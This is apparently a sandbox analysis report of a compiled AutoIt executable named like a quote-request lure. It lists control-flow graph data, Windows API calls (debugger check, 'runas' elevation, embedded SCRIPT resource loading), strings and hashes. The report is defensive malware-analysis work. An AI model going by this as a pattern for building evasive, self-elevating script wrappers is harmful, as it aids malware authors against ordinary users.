98629->98665 98632 ea0843 _fseek 98632->98614 98633 ea07d4 98633->98628 98666 e9a06b InitializeCriticalSectionAndSpinCount 98633->98666 98636 e99ed3 __mtinitlocknum 58 API calls 98636->98637 98637->98628 98637->98629 98637->98636 98663 e96e8d 59 API calls __lock 98637->98663 98664 e96ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98637->98664 98638 ea07fa EnterCriticalSection 98638->98628 98649 ea0877 __wopenfile 98640->98649 98641 ea0891 98671 e98d68 58 API calls __getptd_noexit 98641->98671 98642 ea0a4c 98642->98641 98646 ea0aaf 98642->98646 98644 ea0896 98672 e98ff6 9 API calls _fseek 98644->98672 98668 ea87f1 98646->98668 98647 e95540 98659 e95562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98647->98659 98649->98641 98649->98642 98673 e93a0b 60 API calls 2 library calls 98649->98673 98651 ea0a45 98651->98642 98674 e93a0b 60 API calls 2 library calls 98651->98674 98653 
ea0a64 98653->98642 98675 e93a0b 60 API calls 2 library calls 98653->98675 98655->98610 98656->98621 98657->98621 98658->98621 98659->98621 98667 e99fb5 LeaveCriticalSection 98660->98667 98662 ea0855 98662->98632 98663->98637 98664->98637 98665->98633 98666->98638 98667->98662 98676 ea7fd5 98668->98676 98670 ea880a 98670->98647 98671->98644 98672->98647 98673->98651 98674->98653 98675->98642 98677 ea7fe1 _fseek 98676->98677 98678 ea7ff7 98677->98678 98680 ea802d 98677->98680 98761 e98d68 58 API calls __getptd_noexit 98678->98761 98687 ea809e 98680->98687 98681 ea7ffc 98762 e98ff6 9 API calls _fseek 98681->98762 98684 ea8049 98763 ea8072 LeaveCriticalSection __unlock_fhandle 98684->98763 98686 ea8006 _fseek 98686->98670 98688 ea80be 98687->98688 98689 e9471a __wsopen_nolock 58 API calls 98688->98689 98691 ea80da 98689->98691 98690 e99006 __invoke_watson 8 API calls 98692 ea87f0 98690->98692 98693 ea8114 98691->98693 98701 ea8137 98691->98701 98709 ea8211 98691->98709 98694 ea7fd5 __wsopen_helper 103 API calls 98692->98694 98695 e98d34 __close 58 API calls 98693->98695 98696 ea880a 98694->98696 98697 ea8119 98695->98697 98696->98684 98698 e98d68 _fseek 58 API calls 98697->98698 98699 ea8126 98698->98699 98702 e98ff6 _fseek 9 API calls 98699->98702 98700 ea81f5 98703 e98d34 __close 58 API calls 98700->98703 98701->98700 98704 ea81d3 98701->98704 98729 ea8130 98702->98729 98705 ea81fa 98703->98705 98710 e9d4d4 __alloc_osfhnd 61 API calls 98704->98710 98706 e98d68 _fseek 58 API calls 98705->98706 98707 ea8207 98706->98707 98708 e98ff6 _fseek 9 API calls 98707->98708 98708->98709 98709->98690 98711 ea82a1 98710->98711 98712 ea82ab 98711->98712 98713 ea82ce 98711->98713 98714 e98d34 __close 58 API calls 98712->98714 98715 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98713->98715 98716 ea82b0 98714->98716 98726 ea82f0 98715->98726 98717 e98d68 _fseek 58 API calls 98716->98717 98719 ea82ba 98717->98719 98718 ea836e GetFileType 98720 ea83bb 98718->98720 
98721 ea8379 GetLastError 98718->98721 98724 e98d68 _fseek 58 API calls 98719->98724 98732 e9d76a __set_osfhnd 59 API calls 98720->98732 98725 e98d47 __dosmaperr 58 API calls 98721->98725 98722 ea833c GetLastError 98723 e98d47 __dosmaperr 58 API calls 98722->98723 98728 ea8361 98723->98728 98724->98729 98730 ea83a0 CloseHandle 98725->98730 98726->98718 98726->98722 98727 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98726->98727 98731 ea8331 98727->98731 98734 e98d68 _fseek 58 API calls 98728->98734 98729->98684 98730->98728 98733 ea83ae 98730->98733 98731->98718 98731->98722 98738 ea83d9 98732->98738 98735 e98d68 _fseek 58 API calls 98733->98735 98734->98709 98736 ea83b3 98735->98736 98736->98728 98737 ea8594 98737->98709 98740 ea8767 CloseHandle 98737->98740 98738->98737 98739 ea1b11 __lseeki64_nolock 60 API calls 98738->98739 98757 ea845a 98738->98757 98741 ea8443 98739->98741 98742 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98740->98742 98744 e98d34 __close 58 API calls 98741->98744 98741->98757 98743 ea878e 98742->98743 98745 ea87c2 98743->98745 98746 ea8796 GetLastError 98743->98746 98744->98757 98745->98709 98747 e98d47 __dosmaperr 58 API calls 98746->98747 98749 ea87a2 98747->98749 98748 ea848c 98752 ea99f2 __chsize_nolock 82 API calls 98748->98752 98748->98757 98753 e9d67d __free_osfhnd 59 API calls 98749->98753 98750 ea10ab 70 API calls __read_nolock 98750->98757 98751 ea0d2d __close_nolock 61 API calls 98751->98757 98752->98748 98753->98745 98754 e9dac6 __write 78 API calls 98754->98757 98755 ea8611 98756 ea0d2d __close_nolock 61 API calls 98755->98756 98758 ea8618 98756->98758 98757->98737 98757->98748 98757->98750 98757->98751 98757->98754 98757->98755 98759 ea1b11 60 API calls __lseeki64_nolock 98757->98759 98760 e98d68 _fseek 58 API calls 98758->98760 98759->98757 98760->98709 98761->98681 98762->98686 98763->98686 98765 e74ce1 98764->98765 98766 e74d9d LoadLibraryA 98764->98766 98765->98566 98765->98569 
98766->98765 98767 e74dae GetProcAddress 98766->98767 98767->98765 98769 e75003 FindResourceExW 98768->98769 98773 e75020 98768->98773 98770 eadd5c LoadResource 98769->98770 98769->98773 98771 eadd71 SizeofResource 98770->98771 98770->98773 98772 eadd85 LockResource 98771->98772 98771->98773 98772->98773 98773->98575 98775 e75054 98774->98775 98776 eaddd4 98774->98776 98780 e95a7d 98775->98780 98778 e75062 98778->98582 98779->98575 98781 e95a89 _fseek 98780->98781 98782 e95a9b 98781->98782 98783 e95ac1 98781->98783 98793 e98d68 58 API calls __getptd_noexit 98782->98793 98795 e96e4e 98783->98795 98786 e95aa0 98794 e98ff6 9 API calls _fseek 98786->98794 98790 e95ad6 98802 e95af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98790->98802 98792 e95aab _fseek 98792->98778 98793->98786 98794->98792 98796 e96e5e 98795->98796 98797 e96e80 EnterCriticalSection 98795->98797 98796->98797 98798 e96e66 98796->98798 98799 e95ac7 98797->98799 98800 e99e4b __lock 58 API calls 98798->98800 98801 e959ee 83 API calls 4 library calls 98799->98801 98800->98799 98801->98790 98802->98792 98806 e9582d 98803->98806 98805 e7508e 98805->98594 98808 e95839 _fseek 98806->98808 98807 e95874 _fseek 98807->98805 98808->98807 98809 e9587c 98808->98809 98810 e9584f _memset 98808->98810 98811 e96e4e __lock_file 59 API calls 98809->98811 98833 e98d68 58 API calls __getptd_noexit 98810->98833 98813 e95882 98811->98813 98819 e9564d 98813->98819 98814 e95869 98834 e98ff6 9 API calls _fseek 98814->98834 98822 e95668 _memset 98819->98822 98826 e95683 98819->98826 98820 e95673 98931 e98d68 58 API calls __getptd_noexit 98820->98931 98822->98820 98822->98826 98827 e956c3 98822->98827 98823 e95678 98932 e98ff6 9 API calls _fseek 98823->98932 98835 e958b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98826->98835 98827->98826 98828 e957d4 _memset 98827->98828 98836 e94916 98827->98836 98843 ea10ab 98827->98843 98911 ea0df7 98827->98911 98933 ea0f18 58 API calls 3 library calls 98827->98933 98934 
e98d68 58 API calls __getptd_noexit 98828->98934 98833->98814 98834->98807 98835->98807 98837 e94920 98836->98837 98838 e94935 98836->98838 98935 e98d68 58 API calls __getptd_noexit 98837->98935 98838->98827 98840 e94925 98936 e98ff6 9 API calls _fseek 98840->98936 98842 e94930 98842->98827 98844 ea10cc 98843->98844 98845 ea10e3 98843->98845 98946 e98d34 58 API calls __getptd_noexit 98844->98946 98847 ea181b 98845->98847 98851 ea111d 98845->98851 98962 e98d34 58 API calls __getptd_noexit 98847->98962 98848 ea10d1 98947 e98d68 58 API calls __getptd_noexit 98848->98947 98853 ea1125 98851->98853 98859 ea113c 98851->98859 98852 ea1820 98963 e98d68 58 API calls __getptd_noexit 98852->98963 98948 e98d34 58 API calls __getptd_noexit 98853->98948 98856 ea1131 98964 e98ff6 9 API calls _fseek 98856->98964 98857 ea112a 98949 e98d68 58 API calls __getptd_noexit 98857->98949 98860 ea1151 98859->98860 98862 ea116b 98859->98862 98864 ea1189 98859->98864 98891 ea10d8 98859->98891 98950 e98d34 58 API calls __getptd_noexit 98860->98950 98862->98860 98867 ea1176 98862->98867 98951 e98a5d 58 API calls 2 library calls 98864->98951 98937 ea5ebb 98867->98937 98868 ea1199 98869 ea11bc 98868->98869 98870 ea11a1 98868->98870 98954 ea1b11 60 API calls 3 library calls 98869->98954 98952 e98d68 58 API calls __getptd_noexit 98870->98952 98871 ea128a 98873 ea1303 ReadFile 98871->98873 98878 ea12a0 GetConsoleMode 98871->98878 98876 ea17e3 GetLastError 98873->98876 98877 ea1325 98873->98877 98875 ea11a6 98953 e98d34 58 API calls __getptd_noexit 98875->98953 98880 ea17f0 98876->98880 98881 ea12e3 98876->98881 98877->98876 98885 ea12f5 98877->98885 98882 ea1300 98878->98882 98883 ea12b4 98878->98883 98960 e98d68 58 API calls __getptd_noexit 98880->98960 98893 ea12e9 98881->98893 98955 e98d47 58 API calls 3 library calls 98881->98955 98882->98873 98883->98882 98886 ea12ba ReadConsoleW 98883->98886 98885->98893 98894 ea135a 98885->98894 98903 ea15c7 98885->98903 98886->98885 98888 ea12dd GetLastError 
98886->98888 98887 ea17f5 98961 e98d34 58 API calls __getptd_noexit 98887->98961 98888->98881 98891->98827 98892 e92f95 _free 58 API calls 98892->98891 98893->98891 98893->98892 98895 ea13c6 ReadFile 98894->98895 98901 ea1447 98894->98901 98897 ea13e7 GetLastError 98895->98897 98910 ea13f1 98895->98910 98897->98910 98898 ea1504 98905 ea14b4 MultiByteToWideChar 98898->98905 98958 ea1b11 60 API calls 3 library calls 98898->98958 98899 ea14f4 98957 e98d68 58 API calls __getptd_noexit 98899->98957 98900 ea16cd ReadFile 98904 ea16f0 GetLastError 98900->98904 98908 ea16fe 98900->98908 98901->98893 98901->98898 98901->98899 98901->98905 98903->98893 98903->98900 98904->98908 98905->98888 98905->98893 98908->98903 98959 ea1b11 60 API calls 3 library calls 98908->98959 98910->98894 98956 ea1b11 60 API calls 3 library calls 98910->98956 98912 ea0e02 98911->98912 98913 ea0e17 98911->98913 98998 e98d68 58 API calls __getptd_noexit 98912->98998 98918 ea0e4c 98913->98918 98925 ea0e12 98913->98925 99000 ea6234 58 API calls __malloc_crt 98913->99000 98915 ea0e07 98999 e98ff6 9 API calls _fseek 98915->98999 98919 e94916 __ftell_nolock 58 API calls 98918->98919 98920 ea0e60 98919->98920 98965 ea0f97 98920->98965 98922 ea0e67 98923 e94916 __ftell_nolock 58 API calls 98922->98923 98922->98925 98924 ea0e8a 98923->98924 98924->98925 98926 e94916 __ftell_nolock 58 API calls 98924->98926 98925->98827 98927 ea0e96 98926->98927 98927->98925 98928 e94916 __ftell_nolock 58 API calls 98927->98928 98929 ea0ea3 98928->98929 98930 e94916 __ftell_nolock 58 API calls 98929->98930 98930->98925 98931->98823 98932->98826 98933->98827 98934->98823 98935->98840 98936->98842 98938 ea5ed3 98937->98938 98939 ea5ec6 98937->98939 98941 ea5edf 98938->98941 98942 e98d68 _fseek 58 API calls 98938->98942 98940 e98d68 _fseek 58 API calls 98939->98940 98943 ea5ecb 98940->98943 98941->98871 98944 ea5f00 98942->98944 98943->98871 98945 e98ff6 _fseek 9 API calls 98944->98945 98945->98943 98946->98848 98947->98891 
98948->98857 98949->98856 98950->98857 98951->98868 98952->98875 98953->98891 98954->98867 98955->98893 98956->98910 98957->98893 98958->98905 98959->98908 98960->98887 98961->98893 98962->98852 98963->98856 98964->98891 98966 ea0fa3 _fseek 98965->98966 98967 ea0fb0 98966->98967 98968 ea0fc7 98966->98968 98969 e98d34 __close 58 API calls 98967->98969 98970 ea108b 98968->98970 98973 ea0fdb 98968->98973 98972 ea0fb5 98969->98972 98971 e98d34 __close 58 API calls 98970->98971 98982 ea0ffe 98971->98982 98974 e98d68 _fseek 58 API calls 98972->98974 98975 ea0ff9 98973->98975 98976 ea1006 98973->98976 98993 ea0fbc _fseek 98974->98993 98977 e98d34 __close 58 API calls 98975->98977 98978 ea1028 98976->98978 98979 ea1013 98976->98979 98977->98982 98980 e9d446 ___lock_fhandle 59 API calls 98978->98980 98983 e98d34 __close 58 API calls 98979->98983 98985 ea102e 98980->98985 98981 e98d68 _fseek 58 API calls 98986 ea1020 98981->98986 98982->98981 98984 ea1018 98983->98984 98987 e98d68 _fseek 58 API calls 98984->98987 98988 ea1041 98985->98988 98989 ea1054 98985->98989 98991 e98ff6 _fseek 9 API calls 98986->98991 98987->98986 98990 ea10ab __read_nolock 70 API calls 98988->98990 98992 e98d68 _fseek 58 API calls 98989->98992 98994 ea104d 98990->98994 98991->98993 98995 ea1059 98992->98995 98993->98922 98997 ea1083 __read LeaveCriticalSection 98994->98997 98996 e98d34 __close 58 API calls 98995->98996 98996->98994 98997->98993 98998->98915 98999->98925 99000->98918 99004 e9543a GetSystemTimeAsFileTime 99001->99004 99003 ed91f8 99003->98596 99005 e95468 __aulldiv 99004->99005 99005->99003 99007 e95e9c _fseek 99006->99007 99008 e95eae 99007->99008 99009 e95ec3 99007->99009 99020 e98d68 58 API calls __getptd_noexit 99008->99020 99011 e96e4e __lock_file 59 API calls 99009->99011 99013 e95ec9 99011->99013 99012 e95eb3 99021 e98ff6 9 API calls _fseek 99012->99021 99022 e95b00 67 API calls 5 library calls 99013->99022 99016 e95ed4 99023 e95ef4 LeaveCriticalSection LeaveCriticalSection 
__wfsopen 99016->99023 99018 e95ee6 99019 e95ebe _fseek 99018->99019 99019->98601 99020->99012 99021->99019 99022->99016 99023->99018 99024->98473 99025->98475 99026->98526 99061 ed99d2 __tzset_nolock _wcscmp 99056->99061 99057 e7506b 74 API calls 99057->99061 99058 ed949a 99058->98507 99062 e9432e 58 API calls __wsplitpath_helper 99058->99062 99059 ed9393 GetSystemTimeAsFileTime 99059->99061 99060 e75045 85 API calls 99060->99061 99061->99057 99061->99058 99061->99059 99061->99060 99062->98509 99063->98517 99383 ec665e 99382->99383 99384 ec6641 99382->99384 99383->97836 99384->99383 99386 ec6621 59 API calls Mailbox 99384->99386 99386->99384 99387 e7e70b 99390 e7d260 99387->99390 99389 e7e719 99391 e7d4dd 99390->99391 99392 e7d27d 99390->99392 99405 e7d6ab 99391->99405 99443 eda0b5 89 API calls 4 library calls 99391->99443 99393 eb2abb 99392->99393 99394 eb2b0a 99392->99394 99398 e7d2a4 99392->99398 99397 eb2abe 99393->99397 99403 eb2ad9 99393->99403 99438 eea6fb 341 API calls __cinit 99394->99438 99397->99398 99399 eb2aca 99397->99399 99398->99391 99400 e92f80 __cinit 67 API calls 99398->99400 99398->99405 99407 e7d594 99398->99407 99411 eb2c26 99398->99411 99421 e7a000 341 API calls 99398->99421 99422 e781a7 59 API calls 99398->99422 99424 e788a0 68 API calls __cinit 99398->99424 99425 e786a2 68 API calls 99398->99425 99426 e78620 99398->99426 99431 e7859a 68 API calls 99398->99431 99432 e7d0dc 341 API calls 99398->99432 99433 e79f3a 59 API calls Mailbox 99398->99433 99434 e7d060 89 API calls 99398->99434 99435 e7cedd 341 API calls 99398->99435 99439 e78bb2 68 API calls 99398->99439 99440 e79e9c 60 API calls Mailbox 99398->99440 99441 ec6d03 60 API calls 99398->99441 99436 eead0f 341 API calls 99399->99436 99400->99398 99403->99391 99437 eeb1b7 341 API calls 3 library calls 99403->99437 99404 eb2cdf 99404->99404 99405->99389 99430 e78bb2 68 API calls 99407->99430 99410 e7d5a3 99410->99389 99442 eeaa66 89 API calls 99411->99442 99421->99398 99422->99398 
[Control-flow graph edge list: raw node/edge data for the interactive graph rendering, omitted]

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E73B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00E73B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F362F8,00F362E0,?,?), ref: 00E73BFD
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • Part of subcall function 00E80A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E73C26,00F362F8,?,?,?), ref: 00E80ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E73C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F293F0,00000010), ref: 00EAD4BC
                    • SetCurrentDirectoryW.KERNEL32(?,00F362F8,?,?,?), ref: 00EAD4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F25D40,00F362F8,?,?,?), ref: 00EAD57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EAD581
                      • Part of subcall function 00E73A58: GetSysColorBrush.USER32(0000000F), ref: 00E73A62
                      • Part of subcall function 00E73A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E73A71
                      • Part of subcall function 00E73A58: LoadIconW.USER32(00000063), ref: 00E73A88
                      • Part of subcall function 00E73A58: LoadIconW.USER32(000000A4), ref: 00E73A9A
                      • Part of subcall function 00E73A58: LoadIconW.USER32(000000A2), ref: 00E73AAC
                      • Part of subcall function 00E73A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E73AD2
                      • Part of subcall function 00E73A58: RegisterClassExW.USER32(?), ref: 00E73B28
                      • Part of subcall function 00E739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E73A15
                      • Part of subcall function 00E739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73A36
                      • Part of subcall function 00E739E7: ShowWindow.USER32(00000000,?,?), ref: 00E73A4A
                      • Part of subcall function 00E739E7: ShowWindow.USER32(00000000,?,?), ref: 00E73A53
                      • Part of subcall function 00E743DB: _memset.LIBCMT ref: 00E74401
                      • Part of subcall function 00E743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E744A6
                    Strings
                    • runas, xrefs: 00EAD575
                    • This is a third-party compiled AutoIt script., xrefs: 00EAD4B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas
                    • API String ID: 529118366-3287110873
                    • Opcode ID: 56bf86de8d7ac7d97d0f6a24fe828240e62edcafc3e8570d4341edd52fe2b4d8
                    • Instruction ID: 89162eab67880fdb0adf224d47e762a37e89c00e0948072590d2b4969f634bec
                    • Opcode Fuzzy Hash: 56bf86de8d7ac7d97d0f6a24fe828240e62edcafc3e8570d4341edd52fe2b4d8
                    • Instruction Fuzzy Hash: 4751F770908248BECF11EBB4DC059FEBBB9AF49314F04D069F459F62A2DA709605EB21

                    Control-flow Graph

                    [Control-flow graph for e74fe9 (CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource): raw node/edge data for the interactive graph rendering, omitted]
                    APIs
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E74EEE,?,?,00000000,00000000), ref: 00E74FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E74EEE,?,?,00000000,00000000), ref: 00E75010
                    • LoadResource.KERNEL32(?,00000000,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F), ref: 00EADD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F), ref: 00EADD75
                    • LockResource.KERNEL32(N,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F,00000000), ref: 00EADD88
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$N
                    • API String ID: 3051347437-3852340653
                    • Opcode ID: 4b61f102d6c5de5b11fb31beb970298999b58c8f5fa74f068e24d0e9760c08c8
                    • Instruction ID: 87944d9b6fdc1e4cd7b27243a14ce688262cbb3c2d3dd8cdceb09bdbaa860c24
                    • Opcode Fuzzy Hash: 4b61f102d6c5de5b11fb31beb970298999b58c8f5fa74f068e24d0e9760c08c8
                    • Instruction Fuzzy Hash: 20115E75200700AFE7218B66DC58F677BB9EFC9B51F108568F40AA6260DBA1E804C660

                    Control-flow Graph

                    [Control-flow graph for e74afe (GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, GetSystemInfo, FreeLibrary): raw node/edge data for the interactive graph rendering, omitted]
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00E74B2B
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    • GetCurrentProcess.KERNEL32(?,00EFFAEC,00000000,00000000,?), ref: 00E74BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00E74BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E74C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00E74C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E74C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E74C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 012f9275ce96f2008752e526fa74909459ce09f3052bb8b5f4d821f7577c0554
                    • Instruction ID: 6075e8bda6a9558f34c3cf92215762ff3a2642fc31fd78938656d15bd4ffff77
                    • Opcode Fuzzy Hash: 012f9275ce96f2008752e526fa74909459ce09f3052bb8b5f4d821f7577c0554
                    • Instruction Fuzzy Hash: 5F91C57154E7C4DEC732CB6884511AAFFE4AF6A304B44999ED0CFA7A41D320F948D729
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00EAE7C1), ref: 00ED46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 00ED46B7
                    • FindClose.KERNEL32(00000000), ref: 00ED46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 192ea9ecf11093b9808cd724c989de7bba72780b1413100801a7282145008be3
                    • Instruction ID: ab3bcafd5a85c593a426c5c445e47f44fef6bcb6778d724cb23b73955f25bd4e
                    • Opcode Fuzzy Hash: 192ea9ecf11093b9808cd724c989de7bba72780b1413100801a7282145008be3
                    • Instruction Fuzzy Hash: 86E0D8714104005F52106738EC4D8FA775CDF96335F100716F936E12F0E7B09954C595
                    Strings
                    • Variable must be of type 'Object'., xrefs: 00EB428C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    • Opcode ID: 21eddddd8a37a69fb52fa9645f97f97d4b1ba658dbaf49b7a0d26debae2e813b
                    • Instruction ID: c9f890ce1824f14ccf59f09e9f8be581d5d99f293e9f36affa78a491f34081aa
                    • Opcode Fuzzy Hash: 21eddddd8a37a69fb52fa9645f97f97d4b1ba658dbaf49b7a0d26debae2e813b
                    • Instruction Fuzzy Hash: B7A26B75A04205CFCB24CF58C481AAEB7B2FF58314F2495A9E91ABB352D731ED42CB91
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E80BBB
                    • timeGetTime.WINMM ref: 00E80E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E80FB3
                    • TranslateMessage.USER32(?), ref: 00E80FC7
                    • DispatchMessageW.USER32(?), ref: 00E80FD5
                    • Sleep.KERNEL32(0000000A), ref: 00E80FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00E8105A
                    • DestroyWindow.USER32 ref: 00E81066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E81080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00EB52AD
                    • TranslateMessage.USER32(?), ref: 00EB608A
                    • DispatchMessageW.USER32(?), ref: 00EB6098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EB60AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629
                    • Opcode ID: c1b381d43d3b2dea75a995ab5009b9b68a65e5adeb06f6b74db043913d244e8d
                    • Instruction ID: 3fee2f9fe86898ecad0a189ec015de27ed6f054d24cc2ef337d6ea1afe1fedc6
                    • Opcode Fuzzy Hash: c1b381d43d3b2dea75a995ab5009b9b68a65e5adeb06f6b74db043913d244e8d
                    • Instruction Fuzzy Hash: 3DB2D371608741DFD728DF24C884BABB7E5BF84308F14991DE49DA72A1DB71E849CB82

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00ED91E9: __time64.LIBCMT ref: 00ED91F3
                      • Part of subcall function 00E75045: _fseek.LIBCMT ref: 00E7505D
